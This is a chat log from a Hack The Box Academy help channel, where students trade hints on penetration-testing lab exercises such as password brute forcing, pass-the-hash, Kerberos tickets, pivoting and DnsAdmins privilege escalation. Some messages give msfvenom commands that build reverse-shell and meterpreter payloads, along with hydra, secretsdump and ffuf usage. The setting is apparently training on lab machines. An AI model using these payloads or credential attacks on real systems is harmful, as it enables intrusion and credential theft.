Did you try the one in the reasources for that module?

yeah

username.list and password.list

What is the hydra command you tried?

hmm that looks good to me, you can increase the number of threads, just dont go too high

48 is my sweet spot

Can i PM someone for hint in Predictable Reset Token of Broken Authentication?

hey guys, i have some problems.Right now i am stuck at ICMP Tunneling with SOCKS, Pivoting module
when i run sudo ./ptunnel-ng -r10.129.218.215 -R22 target host return this issue
has anyone had such a problem ?

hello friends please i need help on the Password Attacks module precisely the Linux Local Password Attacks : credentials hunting on linux
what i have tried so far is to brute force both kira and will for ssh credentials but had no match.
secondly i tried smb and got nothing don't know if i am missing something

ok

What exactly is not working?

Not sure if the script or the time in miliseconds

This question?

Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

If so, read the hint

i think i have done every step.. but the script doesn't give me the flag...

what time do you take?
How many tokens do you generate?

i really dont count but the scripts ends without any good response

idk if this conversiont is ok (2023-08-27 05:28:40am - 1693114120000)

is this your local time or the time that is displayed on the page after you have clicked the button?

Your token is: a09ef146a91a55004ed250582c1e8168
And has been created at 2023-08-27 05:28:40am

Your script must use this time as a basis

From this time you now have to create tokens for each millisecond. +/-1second

Hello, i am stuck in https://academy.hackthebox.com/module/147/section/1638 | Ques : Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt. | I got the Daniel hash, and i mounted the smbshare, i mapped into the n drive on the current machine |** but idk how to pTh using the hash of daniel user in order to enumerate the smbshare that i mounted in n | any hint ?**

Hi guys, can anyone help me with this secretsdump error?
impacket-secretsdump LOCAL -sam SAM.save -security SECURITY.save -system SYSTEM.save
[-] read length must be non-negative or -1
[*] Cleaning up...

Do you mean you got "David's" hash but doesn't know how to pass the hash?

yeah

can you please help me ?

You just have to pass the hash via any methods mentioned in the section, then you can access \DC01\david directly

i tried those methods

can i dm u ?

you authenticate to MS01 then access DC01 from it

sure

hello im doing nibbles for the first time Nibbles - Privilege Escalation, but when i try to wget LinEnum.sh i get error 404 file not found?

ive been stuck on this for hours and i cant find the solution

i have downloaded the LinEnum.sh but still cod 404, file not found

Hi all. Im finishing my Academy anual subscription soon. Can I keep doing labs and reading the content of completed modules without being subscribed, right?

A question best answered by our support team I think @limber cobalt - I recall this query coming up before, but cannot ensure the accuracy of my recallection as to the answer 😉

I think what you say is correct

But yeah, don't take my word for it

yep all of the module you owned by either buy using cubes or via a subscription will be for life

the module does show you how to do this part make sure you are running your python http server in the same directory as your LinEnum.sh

first make sure all 3 of your file is valid and none of them is corrupted or are text on accident after that if it's still doesn't try running impacket in a python virtual environment

so did you run the autogen.sh on your or the target machine? if you run it on the target machine then try running it on your machine

Yep,I solved this problem,idk why,but I tried from htb attack box run autogen.sh and transfer to Ubuntu host,and this worked

As I understood, my workstation did not have the necessary specific libraries, because I had the same issue with dnscat and chisel

So i think the updated content also remains accesible, right?

relaying on this https://help.hackthebox.com/en/articles/7891787-canceling-an-academy-subscription I will mantain access to completed modules. Now my question is: Updated content as well?

Again I'd advise reaching out to support for confirmation, but I believe any modules you've completed remain accessible.

I will contact them. Thanks!

oh yep you own the module it self for life so of course you can access updated content

Is anyone able to give ma nudge on the skills assessment for broken authentication? I keep getting the error "User Support cannot have requested role" and i'm not sure how to proceed.

make sure your python server is set up in the same directory where linenum.sh is in and make sure that port is not protected by a firewall

Hi, I'm stuck on the Pass the Ticket (PtT) from Linux part, with the use of chisel. I have retrieved the ticket from julio and imported it into the KRB5CCNAME variable on my pwnbox. But when I run impacket with proxychain, I get a timeout and this error: |DNS-response|: dc01 does not exit . I followed the part with chisel, the modification of the file /etc/hosts by adding the ip and the domain name, the modification of the file /etc/proxichain, the launching of chisel on my pwnbox, and on ms01 with the ip of my pwnbox. PS: I use my own pwnbox, not the one provided by HTB, and I am well connected to the vpn.

if someone could explain why I'm getting this error, that would be great, thank you.

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.

Any suggestions or hint without the sql injection method? I’m in mysql server with the creds I found and digging around the databases. thanks

sure shoot me a dm with the cause of that error if you will need help with that

"Hey, is anyone here familiar with SOC analyst paths

need help !

with what?

lo.l i got the problem

i was goin to write but i solved

no problem

Rubber ducky debugging FTW

if you are having issue with a module just ask here (with the module and section name, your issue, what you try and what didn't work)

Preparation Stage (Part 1)
What should we have prepared and always ready to 'grab and go'?

Mo.. re-read the material

The answer is literally there

I answered as much on your support request

i read it and i think i get it but i think the problem my typing way

so what can i do

DM me what you're entering as the answer

done

Anyone free to help me understand some DNS things

What kinda DNS things o_0

Which module is this?

INFORMATION GATHERING - WEB EDITION
Active Subdomain Enumeration

First of all, Tier 2 module, so please don't paste material like that 🙂 Check the ToS

Give me a moment to have a read

Thanks and my apologies

if this is for the Bino guy then the Getting Started is a tier 0 module but that channel seem to have walkthrough video for Tier 1-2 module

sorry i didnt get what i did wrong. i shouldnt paste the yt link?

It's not the link itself, but other content the channel holds

ok i'm sorry, didnt't checked it

F sorry @shut wraith I gotta go pick up the daughter. The command you provided will return what you need, you just need to filter the output to come to the answer

better to ask your question based on something like #modules message instead instead of saying you following something and it didn't work for you

If anyone else fancies helping and giving nudges, it'd be appreciated

Will be back later

welp guess my shift started 🤣

😆

Don't feel obligated

yep but the question wasn't about following something, it is different my machine from the video i watched and i can't figure it out if it is an hackthebox problem or something. in the video if you try to access the ip via firefox works, from my VM doesn't

The IP in the video, you're not literally using that exactly are you?

He’s here all the time lol

same thing jarednexgent say 😂 and same answer i'm just having fun helping people

ok that i'm dumb but not that much

Sorry, always gotta check the easy answer

maybe they just changed the machine. if somebody could check if connecting via firefox works we can see if im doing something wrong

first which section are you on again? and did you try scanning the target with nmap? if you did then is port 80 open

also just to make sure you use http not https right?

what's the issue, also just want to say i'm not the best when it's some to DNS (to better understand it ask chatGPT 🤣) but if you are stuck on the question then i can help with that

im on Getting Started module in section nibbles - enumeration. yep i used nmap and it says that there are no open ports, i had to use -Pn param because seems to have ping disabled

have you tried using the pwnbox?

oh i think that's the issue all of the nibbles section on this module is a Walkthrough

make sure your vpn is setup right and also it's best to try the pwnbox

i didnt since that i can use only one per day. i will try to see if this is the problem

try crackstation but if that doesn't work then you probably got the wrong hash

hint you got the wrong file

hint ||nope||

Should I DM u so I dont break ToS?

connecting via vpn with a VM shouldnt be the same as using the pwnbox?

oh the ToS from staff was for another guy and sure

nope it's the same

It was for me because he deleted my messages too

oh

@sick fable if you already have your vpn running then try some basic troubleshoot like run ps aux | grep openvpn to see if you have 2 or more openvpn running at the same time or try switching your vpn, additionally because there is a web server running on this target you can try to curl this side for a quick connection test

yep 🤣 you got no idea how many people i helped have this same issue 😂

did you crack the hash?

from the pwnbox works fine. im rebooting the VM, maybe it was a vpn problem

before rebooting i have seen some messages where handshakes failed, btw

based on a error code or a type of error i can't know for sure what's wrong but that could be the vpn so either kill all vpn and re-run your or rebooting will do the same thing

i have rebooted but still doesnt work. the grep openvpn command return this:

root 1376 0.0 0.1 11032 7596 pts/0 S+ 16:18 0:00 openvpn /home/luca/HTB/VPN/Bbinoz.ovpn
luca 1411 0.0 0.0 6332 712 pts/1 S+ 16:19 0:00 grep --color=auto openvpn

also you can't have the pwnbox and your vpn on at the same time

i don't have limited pwnbox so i don't know but if turning off the pwnbox mean you are done with the pwnbox for the day then don't just do it on the pwnbox

oof didnt know that. i guess i will just do this machine from the pwnbox

yep. thanks for your help!

np 👍 👍

anyone has a good smtp command cheatsheet list

i'm doing the attacking common services

easy assessment

Is there an Active Directory defense module yet?

not entity for defense but the closest thing is the Windows Attacks & Defense module

me and other and send many link here before you can do a quick search here for that if you can't find any i'll send you some

Ah thats unfortunate in fundamentals for AD they say theyre working on AD defense module but that module was made early 2022

probably a no go then

yea i've done a quick search haven't found anything useful

hello everyone! I am currently in the Remote Code Execution (RCE) via the Theme Editor section in the hacking wordpress module. in this section I could not find the answer to the question. can anyone help me how to do it?

Hello friends. I have problem with authority machine, can you help me?

read #welcome and #rules after that use /verify at #bot-commands and ask that at #boxes

In the module Windows Privilege Escalation section DnsAdmins, why does get group "Domain Admins" /dom show the netadm user as part of the Domain Admins group but whoami /priv does not?

Hey, I'm currently stuck on the Linux Privilege Escalation skill assessment. got flag 1-3, now struggling to find a way into the tomcat webapp. from what I've read the creds can be found somewhere but it seems like I'm totally missing something. Anyone able to give me a hint?

Hello all. I'm currently running the Footprinting medium lab and am stuck trying to login to SSMS. I've gone through alex's directory and found the txt file with the sa password, but the password doesn't work to run SSMS as admin. One of the forums mentioned that some of the characters are not what they seem, but the only thing I could think to try as replacing the @ symbol with a period. Can anyone point me in the right direction to get logged into SSMS as admin please?

what's the issue?

for that i end up have to get a shell because get adding into DA didn't work for me and i do remember something about some guys here when troubleshoot this found out that one of the way to get it work is to reboot the machine (not reset)

from my note it's seem like on bottom of one of the tomcat page there is a directory and enum from that directory you can find the cred but of course a bit of enum and you will find the cred

no idea what you mean by SSMS but a hint for that is ||username spraying|| the pass that you have for that user will work for some other user that can access mssql

So instead of an msvenom dll that adds the user to the Domain Admins group you used a msvenom dll that gave you a reverse shell running in the DNS server with NT AUTHORTY\SYSTEM ?

you're a legend. thank you so much! found it immediately. pretty sure you just saved me a couple of hours and my sanity 😄

my pleasure

not that simple because when dns load your malicious dll it's will have nothing but a rev shell so the whole thing will crash and your shell will die

you have to make this a 2 part thing make a dll payload that will run a shell and make a shel for that dll to run something like this

msfvenom -p windows/x64/exec cmd='C:\Users\netadm\reverse.exe' -f dll -o sussy.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe

So sussy.dll get loaded with dnscmd, then what do you do with reverse.exe ?

wouldn't recommend you name your malicious dll that but when the dll is loaded it will run the shell

Do you know why net group "Domain Admins" /dom shows the netadm user as part of the Domain Admins group but the netadm user still can't execute commands that require Domain Admins privileges? It doesn't seem like a very practical exploit if it requires the target machine to be rebooted ?

rebooting only is one of the way one of te guy here found a way to make that way work

but no idea the issue is the user isn't fully added to the group so that user can't access admin stuff

and something like an reboot would fix that issue (just that issue)

Hey, is machines contain walkthrough just like starting point?

There are some „guided“ machines, but they are all easy

Hello everyone. Excuse me if this isn't the right channel.
I'm struggling to set up WSL in my Windows VM. Apparently there's something wrong with VirtualBox and nested virtualization (https://github.com/microsoft/WSL/issues/5430). Been using Windows11+WSL for a year but recently switched to Pop!_OS as my host machine.
Has anybody succeeded? Should I just try another hypervisor? I've tried quite a few PWSH commands/approaches but none worked. Thanks.

PS. I tried the Enterprise Evaluation ISO as outlined in the Fundamental module, didn't work and didn't like it, the VM is running Pro N atm

I'm working on the final questiuon of the Pass the Ticket in Linux section of the Password Attacks module. I have a root shell on the linux01 machine and, following the hint, I found the file that contains the Kerberos ticket for linux01. I used keytabextract to find the NTLM hash of the password found in that file, but CrackStation, John, and Hashcat (with rockyou as well as the pasword.list provided for this module) couldn't crack the password. I'm not sure what I should do with the Kerberos ticket for linux01 to access the //DC01/linux01 share. When I try to use smbclient to access that share, I keep getting permission denied messages.

Let me know if that isn't enough information, and I can show the commands I've used so far to try and access the share. I just don't want to give too much away for people who haven't tried this problem yet.

you guys know any free labs to test my XSS knowledge?

aaand how do i get my role here on discord?

Portswigger academy XSS section

For roles, see #welcome

portswigger

consider using another hypervisor like hyper-v that supports nested virtualization

ok thanks i may try vmware/qemu/kvm. hyper-v is windows-based and im running Linux nowadays

If all you want is linux commands on Windows, cygwin and/or Git Bash might be good alternatives

https://www.cygwin.com/
https://git-scm.com/download/win

i dont remember how i got it working originally but i can say i regularly use WSL inside a windows 10 VM with virtualbox

i think there are some bios options that need to be set to allow nested virtualization and might only be supported on certain platforms/cpus

can anyone give me a hint for Metasploit -> Meterpreter, it just says "Find the existing exploit", from what i have found the box is running SMB + RDP so my mind went straight to EternalBlue as 1/2 the modules ive done so far have involved that, but the exploits for that dont seem to be working and nor are any of the other ones ive tried, they all seem to want credentials. am i meant to be bruteforcing some creds? or did i do something else wrong

proper enumeration goes a long way🫶

😦 ok so ive missed something

i think i may have just found it 🙂

need to get back into rhythym with this stuff its hard to pick back up after a month :p

tbh it probably would have been disappointed if every time i was asked to find an exploit it was eternal blue but i needed an easy one to get back into things

i found something on a higher port and now have my shell 🙂

where do a report a typo in a module?

#858470491676737536 🙂

Thank you

I'm working on Password Attacks Lab: Medium. I retrieved Docs.zip and unzipped it to get Documentation.docx, which is encrypted. I got the decryption key for the file, but I don't know how to use the key to decrypt the .docx file

open it in libreoffice if you don't have Microsoft Office

Attacking Common Services - Easy

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.

I found a user creds for mysql and I'm trying to read the flag.txt or connect to the system by
adding cmd injection in sql syntax it's working I can now do the dir commands from the browser but I can't navigate.
I'm stuck at xampp/docs folder

Any hint? please

You can't do cd from a webshell, it will just execute commands from whatever directory the webshell is in. If you can run dir like you say you can, just specify absolute paths in your arguments and you should be fine.

Thank you I found the file, it actually worked I didn't know this.

finally completed! the labs were fun, I completed the last lab (the hardest) without any help

It worked for me with

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse2.exe

How did you manage to run odat in Oracle TNS section

That takes 7 hours and still gives me nothing

afaik it was good for me

can you tell me whats the problem? I dont remember for that section well

Any answers you need for the odat stuff should come in before the scan completes

I got through it relatively quickly iirc

Just watch the output

The issue is it never give anything just XE and that's it

I’m away from my computer right now, but once I get back I can take a look at it

wait… this is the hardest?😭

I mean there are three labs at the end of the module, and the last one is the hardest (the lab 3)

any nudges on the "Web Enumeration" flag at the start of the pen test track? Found a few sites, got the creds for one, logged into a cryptic message - cannot for the life of me work out what to do next, can't find any roads to go down

you mean this section? https://academy.hackthebox.com/module/77/section/728

||once you log in that cryptic message you've found is the flag||

^not sure if i should tag as spoiler but just in case

is it?

submit it :)

FFS, I tried that about an hour ago, first thing I tried

but worked just now, I thought I was going crazy - thanks for the sanity check

Hardest in the module, not on the whole path

no worries, i've gone down that rabbit hole before

Can someone tell me if it is unsafe to use a dual boot instead of a vm?

If you're talking about for kali/parrot, you should not be running a pentesting distro baremetal.

can soemone please help me in getting answers of nessus skill assessment

That was what I was talking about, when I tried using hashcat on a vm things didn't work much, but ok, I will figure something out, thx!

did they change the academy?

I think my percentages are higher now

they were much lower before I think

yes

my offensive percent went from ~50 to ~60 and I haven't done anything since finishing the CPTS path

You can run hashcat on your host

Can anyone help me out with the first Documents and Reporting Question? So far, I have cracked the ||IPMI hash|| and have two other sets of creds from the notes. I have used ||crackmapexec|| and ||xfreerdp|| to try to get to DC01, but so far, nothing has worked.

go for the low hanging fruit first

you should be able to get DA without even looking at the notes

yes, the dashboard seems to be fixed

I think I will just try enumerating DC01 as if I were starting fresh since I can't get any of the creds to work. Apparently, I've got a lot to learn about AD pentesting still.

everything you need to know about AD pentesting for CPTS is in the AD module, but having an understanding of what the quickest wins are is also important

do you guys pull request on your own solo project?

Depends on context but usually no

Go check out #welcome for information on how to verify so you can access the programming chat :)

I think I am on the right track...I have a good finding. I imagined what it would have been like to have a lazy co-worker and went from there, lol

Just got the first flag of that module

Can someone help please? I'm having an issue with HTB Academy. I'm doind the BASH fundamentals course and one of the exercises asks the following:
Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

I did the for loop and it iterates correctly but when it reaches 28, instead of giving me the $flag it returns this:

Counter = 28 - Assigning value to Salt
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
140676000277824:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:615:
[11:40 AM]
my loop is correct, but seems like the decrypt method is deprecated?

I can't spawn the target too

It keeps spinning forever

i'm on getting started module, last page (knowledge check) where i have to try the first box by myself.
i have found the admin pwd from the hash, and i have found the upload menu. upload file doesnt work but reading the html source i have found that works if i turn off JS. i have tried everything but let upload only non-php files. i tried searching for other php extensions that works the same but no result. can somebody tell me if this is the right path?

the hint tell me to use metasploit but i'm pretty sure that there is a way in this way too, maybe im wrong

I am unable to spawn my target from the password attacks module (Pass the Ticket (PtT) from Linux). It is taking forever.

Ye cant spawn here either must be a problem on their end

Hopefully they resolve soon

has anyone messaged support yet?

just to give a little bit of a different perspective. i seem to be able to spawn either my target OR my pwnbox 😅 so if you have the option, maybe try your own VMs

I can spawn a target but it seems kinda broken and VPN also is a acting up a bit. Gonna do some more testing to figure out whats wrong

lol

which section/question exactly? I can check my notes

Can you show the exact command you're using?

I have the same issue

Ive had it for 15 minutes now

or more

deleted the message cuz i thought they fixed it xd

I switched to TCP VPN now and it worked

Ah

Oke

Yes, now it works

65.21% and 22/36 on the AD module

Wait a while

wby?

Isn't it mutated loveme one?

So, it should crack

Nicee, almost 50%💪

Mutated of loveme

You don't have to use others

do you still need help?

yup

can you show me the code you wrote? I don't need all the code just the one you need to implement and put it in spoiler tags otherwise I'll dm you. Up to you

doing the vulnerability assessment module atm and there's two questions in both the nessus & openvas chapters where you're asked what IP address the hosts you scan use, but they're just in the description of the module as well

free cubes i guess but still

Guys I am unable to spawn any target

Changed the vpn to Tcp

Still not working

I was able to spawn a target after 1 hour of trying over and over and over again

But now it said "Something went wrong while generating your VPN Key, if this persists please contact support"

yeah I messaged support already. they're investigating but dunno what the progress is looking like

Same issue as well.

i'm on getting started module, last page (knowledge check) where i have to try the first box by myself.

im trying to find the right exploit with searchsploit but i cant find it. i have found all the versions that the webserver is using, and i think that the key is to use GetSimple CMS 3.3.15 or something but isn't working. can somebody give me a hint?

I found two ways to do this box. The way you are doing, you already have the info you need in what you just wrote. just 'search' for it, if you are using metasploit

is anyone available to help me understand what i am doing wrong with a xfreerdp command for the Documentation and reporting module. I have been constantly confused at the directions.. and the report already started in the module gives creds and i can none on them to work. so i am assuming it is a bad xfreerdp command but could be something else.

what exactly isn't working?

feel free to dm if u prefer

Is anyone able to flag my account to get past the onboarding screen? It's stuck on it and loads directly to it even if I clear all browser files and cache.

Can someone help me with skills assessment in Shells and Payloads chapter?

yo guys, im currently doing the live engagement in shells and payloads section 2, ive currently rdp'd to the ip we got given and got the answer to question 2 but now im stuck. After looking at the hint it says you can browse to the ip hosted on port 8080 or status.inlanefreight.local but for the life of me i can not find a broswer on the rdp box or access it on my kali machine, an help appreciated

proper enumeration goes a long way 🙂

Hello, attacking common services : hard, I keep getting this now and it was working fine before, reset machine and my own VM, baffled

The whole academy is there to teach you

And honestly your description constitutes a serious rule break imo

<@&861185840277487616> haven't dared use this tag before but ... general rules, rule #3, look at this guy's about me, appalling in my opinion

ATTACKING WEB APPLICATIONS WITH FFUF

Skills Assessment - Web Fuzzing

Question:

Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains?

First command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP/indexFUZZ -fs 985

.phps found

Second command:
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP -H "HOST: academy.htb/indexFUZZ" -fs 985
Nothing
Third Try
ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u archive.academy.htb/indexFUZZ
Nothing
Tried to fuzz multiple locations in command using custom sub list made from previous question where I successfully found subs:
ffuf -w subs.txt:SUBS,/usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP -H "HOST: SUBS.academy.htb/indexFUZZ" -fs 985 -fs 0
Nothing
Any help would be appreciated

Much appreciated!

thank you!

Feel free to let us know If you see anything against TOS or something potentially harmful and/or insulting in the future.

Hey @winged hedge can I please get your incredible input on my question (very please)

I would if I had the time as I'm at work I need to finish up a project I've been working on.

yo guys, im currently doing the live engagement in shells and payloads section 2, ive currently rdp'd to the ip we got given and got the answer to question 2 but now im stuck. After looking at the hint it says you can browse to the ip hosted on port 8080 or status.inlanefreight.local but for the life of me i can not find a broswer on the rdp box or access it on my kali machine, an help appreciated

you might wanna reduce the lengthyness of your questions, makes it hard for anyone who wants to help you. From what I see here, you are running an extension fuzz on the wrong vhost, you get nothing because you are fuzzing on the second-level domain/just the domain name and not all vhosts, which is why you wouldnt get the extensions accepted by the domainS
When you figure out the vhosts, you can use a bash script one liner to fuzz all at the same time for valid extensions something like `for vhost in vhost1, vhost2; do ffuff <SNIP> ; done

you can spawn a browser via the terminal. you dont need an icon necesarily.

i tried using xdg-open <url> but im just getting

try using firefox <url>

Dog

What are u guys coding?

still no luck 😦

try firefox &

nope no luck

thank you tho

try sensible-browser <url>

Just firefox should work... the & makes it background

it didn't

You're running the terminal as root, which is why it can't find the display.

Also: you should almost never be running as root. There's little to no point in it

type in "exit" then xdg-open <url>

ah that worked thank you

noted

in Powerview.ps1 there is a command Get-NetLocalGroupMember I am trying to use this tool to find remote powershell capable users for a module. an example command given Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users" gets me, if i understand, who can RDP to the box but I cant find documentation on what GroupName is associated with remote PS. can some one guide me to some documentation that gives a hint? The module only seems to cover bloodhound examples... i have tried to list the groups with the command net localgroup but don't see anything that looks to be related to powershell

Hello guys, is it possible to use responder in analyze mode with ligolo ?

sudo responder -I ligolo -A set up the interface for ligolo, but i do not get any llmnr nbt-ns response

users who can psremote belong to the Remote Management Group I believe so if you wanna use powerview it would look like this Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"

Active Directory Enumeration & Attacks - Privileged Access. I haven't been able to RDP to the host for the whole day (When I was able to I got a black screen)

Remote Desktop Users are users who can RDP, entirely 2 different things

I have 0 errors

try some other rdp client

Ah now it works (with another rdp client)

weird

Why does it say the password is wrong?

sign in with the domain logon sytax \

like DOMAIN\User

A

I had to specify inlanefreight for some reason?

F

Hey could anyone help me for the RCE prototype pollution part in HTB Academy ?

anyone did the assembnly module ? i am on the skill assessment i was able to get shellcode but its not executing. id love any help 😄

If it's black like that u can try pressing enter

aaa

oke

https://academy.hackthebox.com/module/68/section/277 Active Directory Powerview - Enumerating AD Users - Find the second user with a password in the description field. Submit the password as the answer.

someone could sanity check, not sure if the answer is bugged

or I am just dumb lol

nevermind I was submitting the user lol

Hi , just started explosion, answered first question and now next one is not opening , got stuck; refreshed; logged out, and logged in again, seems no solution ... help anyone ?

htb has had some issues today for quite a few people. waiting it out is one thing you can do. also, for future reference, explosion is part of starting point, isnt it? this is academy, thats something else again. see here: #starting-point

@topaz shard thx for informing me and yes i had the wrong channel, just wanted help, i'll be more carefull next time , thx a lot

Hello asking again as stuck still , Attacking Common Services : hard, I keep getting this now and it was working fine before, reset machine and my own VM, baffled

I'm working on the last question in Pass the Ticket from Linux in the Password Attacks module. The question asks me to find the Kerberos ticket for the machine Linux01 and use that to find the flag in \DC01\linux01. I found the file containing the ticket for the Linux system (I have root privileges, so I can access this ticket), and I transferred the ticket back to my attack box. I don't know what to do from here. How do I use the ticket to gain access? If the target were a Windows machine, I would use Mimikatz or Rubeus to pass the ticket. Not sure what to do with a Linux target.

You're to read the flag on the share from the box using the ticket you acquired.

Yes, that's what I'm trying to do. I have the ticket corresponding to the machine LINUX01, and I want to use it to access the share \DC01\linux01. But I'm blocked on using the ticket to access the share.

Hello
Maybe someone know how to connect to SMB and read the flag in second question of
Attacking Common Applications
PRTG Network Monitor?
I got the username and password but idk how to connect to smb
I also got the info about the shares

https://i.imgur.com/RCKnxbR.png

really love it when this happens

You can use smbclient to read the flag with the kerberos ticket switch and no password switch, you can glance through the section this is explained there.

you can connect using smbclient with the user & pass

If I try using smbclient to view \DC01\linux01, I get an access denied message. If I try to use kinit and specify the file containing the ticket (there's a hint for this question that talks about the need to get this file) I'm told that the keytab does not contain suitable keys.

When I use keytabextract to get the NTLM hash from the keytab file, the hash is not crackable by John, Hashcat, or crackstation.

Thank you! I just got it. I was using the @inlanefreight.htb domain in my kinit command, but it's just LINUX01$ without the domain. I don't fully understand why though.

Also, thank you @faint rampart

Hi, did anyone finish the skills assessment in introduction to malware analysis and can help me with one of the questions?

did anyone do Introduction to splunk & SPL module?
im currently stuck at the practical exercises

@lean grove @fleet bramble
Just ask the question.
Yes, someone has certainly completed the module

I am doing the footprinting lab - hard and i found my way to the private key. i created a file called id_rsa and put the key in there and chmod'ed the permissions to 600. when i try to ssh using this id_rsa file, i get an error saying 'Load key "id_rsa": invalid format'. sooo, what file type does this file usually have? anyone, please?

how does student subscription works for modules, if i unlock one module i will be able to use it even after the subscription?

If you've completely finished it, then yes.

really cool! what does it mean "+ CPE credits submission"? it is a thing given in every subscription plan

CPEs are for certificates

With the modules you can earn CPE credits

oh ok, thx

@acoustic owl since youre here, can you help me with my question? can you say anything about that?

I do not know for sure. Do you have line breaks or extra spaces in the content?

so you suspect an error while copying the key itself rather than something with the file?

did anyone do Introduction to splunk & SPL module?
im currently stuck at the practical exercises

im stuck at this question:
open the "Search & Reporting" application, and find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests. Enter it as your answer.

Hello guys, my basic knowledge about OOP tells me that you can't declare a "full" object of a class untill you fully define the class (but you can declare a pointer of that type), but when you overload an operator for that class you just define a function that takes an object of the same class as a parameter, i know this works, but can someone help me understand why or how this WORKS anyway??😅

What is not working?

i need some help of what to type in the search bar haha, my brain is kinda fried

Then take a break. Read through the section again and then try again.

Try to find out how the event is logged

:)) ok i will try

Yes

as far as i am concerned, the key looks good. no weird line breaks or spaces in there.

mind if i send you a screenshot of the key in a DM?

The key is a text file. The name does not matter in principle. I often call it username.key

Is everything in one line?

no, its a nice block formatting with a neat end line

every row

except the last

is the .key important? ive just got it as id_rsa with no file type

Try to write everything in one line.

No, it is not important

You can name the file whatever you want.

ssh -i /path/tp/your.key username@ip

that didnt change anything

oh yeah, this is probably gonna be stupid, but... i do need the public key as well, right? 😅

or is the private key alone enough to login with ssh

You only need the private key

Wait, the last line should contain a line break

so the last line is an empty line?

Yes

that was actually it

thank you very much

while using hydra i get this error "target ssh does not support password authentication (method reply 4)." What should i do? Module is login brute forcing

Pick something else to brute

is it me or has the vpn or connection been really weird lately?

It is weird today

thank god, i was loosing it

What is the best way to esclate priv during an ssh attack?

There's no such thing.

@proud pine but you have to get root access on ssh sometimes, and what i'm asking, what is the best way to approach it, trying to learn here

to clarify, i mean you could ssh with a user you already know but how is the best way once inside to get root

There is no such thing as a 'best way'. You have to enumerate, and determine what is relevant.

Hello ☺️ I'm currently stuck on the module "introduction to malware analysis" on the skills assessments section, 4th question. I have no clue how to get through it and have no idea if I even approach it the right way. Is anyone willing to guide/help me? Thanks in advance! Feel free to dm me as well

In the module "Protected Archives", i got a user kira but i need root to be able to get the .zip file, I was wondering what is best practices or how would someone do that?

What did the module tell you to do?

to get the Notes.zip file and decrypt it, i have tried scp to get the file and decrypt with john

Did you zip2john it first

yeah and it said permission denied

How is it permission denied if you're doing that on your own system

Transfer zip > Crack it

you can't transfer it with scp, i tried that that was my original plan

There's more ways to transfer than scp

See the file transfer module

Tried rsycn and curl and both "Permission denied"

There are other possible methods. The other method might work with just copy+paste

what is different between absolute or relative sequence number And how do I differentiate between them؟

+if any one end network analyze module can help me?

i tried doing the cat md5 hash thing and still got Permission denied

Looks like you don't have permission for the file itself not the services/apps you wanted to try

You might need to find or pivot to the owner of the file first

root is the owner of the file

Who has read access? Maybe there are other users with read access

I recall that didn't belong to root before though. It was found in one of the users only

yeah i thought it was weird too because i did locate Notes.zip and that is what is showed

You're in the protected archives section of the password attacks module right? It should belong to kira

I checked the file and it does belong to kira

Yeah for some reason locate showed it in root, i found it kira, i wrote a script to go through all users to find that file.

I just uncracked it

thank you @ebon coral

You're welcome

Anyone please? 🥹

what is different between absolute or relative sequence number And how do I differentiate between them؟

???

sorry been away for the weekend, here is the screen shot, I must be missing something really simple! Or I am completely stupid! I cant even paste an image here!!!

You have to verify before you can post a screen shot check the welcome page

anyone know, why I can't unlock module even though I have enough cubes?

it's like everytime i click unlock layout of the web page change

Absolute = if I give you a number in the sequence it's guaranteed to be in that spot
Relative means that it's location is based off of another reference point.
Like
[0,1,2,4,6,8]
4 is the absolute 4th [3] position of the array. However it is relatively the second position after 1, and 1st position before 6

Try disabling any adblock that may be running (some browsers have a built in blocker)

it work, thanks

Hi I am thinking after I complete Nmap module I may switch from CPTS path to CBBH. I feel like that way I can focus on one type of hacking which feels more linear. I want to be good at web anyways. I think bug bounties would be great way to gain advanced web app hacking skills.

I’m gonna study some web development to go with it. But my thinking is I want to get it out of the way.

Anyone here solved the secure coding javascript 101 module? I have the question about the last question of the skill assessment, which script I have to upload? The vuln.js or check.js?

You can technically just do the path, if you want to go that route - you don't really have to get the cert unless you just want it. You can sign up for something like hackerone without needing anything. If you did want to do something more advanced like Synack's bug bounty system, I don't think they have a path for CBBH cert, but they do for CPTS.

I know there are varying thoughts on this, I would actually recommend CBBH first. I also watched a youtube with mrb3n and a couple other HTB staff members who recommended this as weill. Plus if you go that route you will find a bunch of the CPTS modules are done when you get to it. The first 6 modules on CPTS are worth doing first as well if you wanted.

Just finished the Documents & Reporting module...that lab was a doozey!

Can I get a hint on this one, please?

Password Attacks
Credential Hunting in Linux
Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Have found the attack vector, having trouble transferring the file to the attack host as I can't load the tool that got deleted in .bash_history

Login the kira in ssh and run python server. then you can download to your local vm.

Or you can use scp

Module Shells & Payloads The Live Engagement Host -2: getting error when running 50064.rb exploit. The error is NoMethodError undefined method ‘get_cookies’ for nil:NilClass. Does anyone know how to fix this? Thanks.

anyone

@autumn pilot or use pwncat

vuln.js

